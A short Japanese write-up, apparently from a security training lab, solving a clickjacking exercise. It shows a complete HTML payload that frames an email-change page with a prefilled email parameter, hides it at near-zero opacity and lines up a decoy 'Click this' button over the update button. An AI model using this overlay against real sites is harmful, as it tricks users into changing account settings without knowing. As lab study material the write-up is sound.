Hello there, ('ω')ノ
URLパラメータを追加したフォームを使用したクリックジャッキングを。
まずは、ログインして。
今回、ターゲットとなるURLは下記のとおりで。
https://acaf1f3b1e08f8b480377b41005600f9.web-security-academy.net/email
インターセプトして、リクエスト内容をみると。
CSRFトークンで保護されているようで。
今回は、URLパラメータを追加したURLを事前に用意して。
ユーザに気づかれないようにメールの更新ボタンをクリックさせるようにすることに。
<style>
iframe {
position:relative;
width:700px;
height: 700px;
opacity: 0.5;
z-index: 2;
}
div {
position:absolute;
top:440px;
left:80px;
z-index: 1;
}
</style>
<div>Click this</div>
<iframe src="https://acaf1f3b1e08f8b480377b41005600f9.web-security-academy.net/email?email=user@mail.com"></iframe>
半透明にして、メールアドレス変更ボタンをクリックさせる位置を調整して。
透明度を変更して、保存すると。
opacity: 0.0001
クリアできた。
Best regards, (^^ゞ